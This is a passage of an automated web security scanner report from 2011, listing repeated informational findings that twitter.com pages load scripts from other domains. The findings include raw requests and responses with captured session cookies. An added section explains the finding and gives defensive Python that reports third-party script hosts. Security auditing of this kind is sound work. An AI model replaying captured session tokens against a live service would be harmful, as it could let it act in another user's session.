<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.416. http://twitter.com/ebello

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ebello

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-69634-53816
ETag: "ec4d064b3111971c1cbbd076806b6c98"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01003
Content-Type: text/html; charset=utf-8
Content-Length: 54961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.417. http://twitter.com/ebello

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ebello

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234690-97078-11272
ETag: "3ac69aa6fba7872c9356566327e68065"
Last-Modified: Fri, 28 Jan 2011 17:11:30 GMT
X-Runtime: 0.00791
Content-Type: text/html; charset=utf-8
Content-Length: 54761
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.418. http://twitter.com/ericmmartin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ericmmartin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224922-26410-25724
ETag: "b52f4470d0eb7102204e56e131ce2f8f"
Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT
X-Runtime: 0.50069
Content-Type: text/html; charset=utf-8
Content-Length: 58034
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.419. http://twitter.com/ericmmartin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ericmmartin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ericmmartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234544-28409-10830
ETag: "313b3007599a1168ba8e042cedcc9002"
Last-Modified: Fri, 28 Jan 2011 17:09:04 GMT
X-Runtime: 0.01156
Content-Type: text/html; charset=utf-8
Content-Length: 57914
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.420. http://twitter.com/ericmmartin/status/30128016856195073

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ericmmartin/status/30128016856195073 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225136-38088-7388
ETag: "f6a17b6b0e09ba551b3fcd0add86e0b6"
Last-Modified: Fri, 28 Jan 2011 14:32:16 GMT
X-Runtime: 0.04877
Content-Type: text/html; charset=utf-8
Content-Length: 13727
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOgxjc3JmX2lkIiU1MWM0MjRl%250AMGRlMzJjMmY1NTExZmQxNzlhOGIzZGNjMzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--b552be777e5e2a8892e6adb3be303462d0947af8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
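Every finding from 18.411 onward is the same scanner check: the HTML served by twitter.com carries script tags whose src points at a host other than twitter.com, so code from those hosts runs with full access to the twitter.com origin. The report lists the raw script tags but not which hosts are genuinely third-party. The Python below, added here as a worked example and not part of the crawler report or of any Twitter code, reimplements the check: it parses a response body, collects every script src, skips relative URLs (same host) and reports the remaining hosts, with an optional list of trusted suffixes so that a site's own asset CDN (twimg.com here) can be separated from true third parties such as ajax.googleapis.com and www.google.com. The sample body is constructed from the script tags visible in the responses above plus two made-up entries (a relative path and a protocol-relative cdn.example.test URL) to exercise those branches.

```python
"""Reimplementation of the "cross-domain script include" check: list the hosts
from which a page loads <script src=...>, excluding the page's own host.
Added example; not code from the scanner report or from Twitter."""

from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def _is_trusted(host, trusted_suffixes):
    """True if host equals a trusted suffix or is a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def cross_domain_scripts(page_url, body, trusted_suffixes=()):
    """Return sorted (host, src) pairs for scripts served from a host other
    than the page's own.  Relative src values have no host and are skipped;
    protocol-relative values (//host/path) are treated as cross-host when the
    host differs.  Hosts under trusted_suffixes (e.g. the site's own CDN) are
    dropped so that only the remaining third-party origins are reported."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(body)
    found = set()
    for src in collector.srcs:
        parts = urlsplit(src)
        if not parts.netloc:
            continue  # relative path: fetched from the page's own host
        host = (parts.hostname or "").lower()
        if host == page_host or _is_trusted(host, trusted_suffixes):
            continue
        found.add((host, src))
    return sorted(found)


def cross_domain_hosts(page_url, body, trusted_suffixes=()):
    """Convenience wrapper: just the distinct offending hosts."""
    return sorted({h for h, _ in cross_domain_scripts(page_url, body, trusted_suffixes)})


# Constructed sample: the script tags seen in the twitter.com responses above,
# plus an inline script, a relative src and a protocol-relative src (the last
# two and the cdn.example.test host are made up for this example).
SAMPLE_BODY = """
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script type="text/javascript">var inline = 1;</script>
<script src="/javascripts/local.js"></script>
<script src="//cdn.example.test/widget.js"></script>
"""

if __name__ == "__main__":
    for host, src in cross_domain_scripts("http://twitter.com/danwrong", SAMPLE_BODY):
        print(f"{host:25s} {src}")
    print("third-party only:",
          cross_domain_hosts("http://twitter.com/danwrong", SAMPLE_BODY, ("twimg.com",)))
```

The trusted-suffix list is a judgement call the scanner cannot make for you: twimg.com is operated by the same party as twitter.com, but it is still a separate origin and a separate set of servers, and any compromise of it (or of ajax.googleapis.com, or of the path to either over plain http, which is what every src above uses) yields script execution inside twitter.com. Reviewing this list per host is the real work behind an "Information" severity finding.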

18.421. http://twitter.com/ericmmartin/status/30128016856195073

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ericmmartin/status/30128016856195073 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234557-34796-32877
ETag: "d40ce77f8be108331b24d45f1d634f24"
Last-Modified: Fri, 28 Jan 2011 17:09:17 GMT
X-Runtime: 0.06272
Content-Type: text/html; charset=utf-8
Content-Length: 13598
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW4vc3RhdHVzLzMwMTI4MDE2ODU2MTk1MDczOhVpbl9uZXdfdXNlcl9mbG93%250AMDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6%250ADHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--9efe61bfedd721e7bb9d52a6d8f907146da272da; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.422. http://twitter.com/ericmmartin/status/30128016856195073

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ericmmartin/status/30128016856195073

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ericmmartin/status/30128016856195073 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224926-9669-3756
ETag: "8a207398e91696a15179ff55977c38f1"
Last-Modified: Fri, 28 Jan 2011 14:28:46 GMT
X-Runtime: 0.04848
Content-Type: text/html; charset=utf-8
Content-Length: 13726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
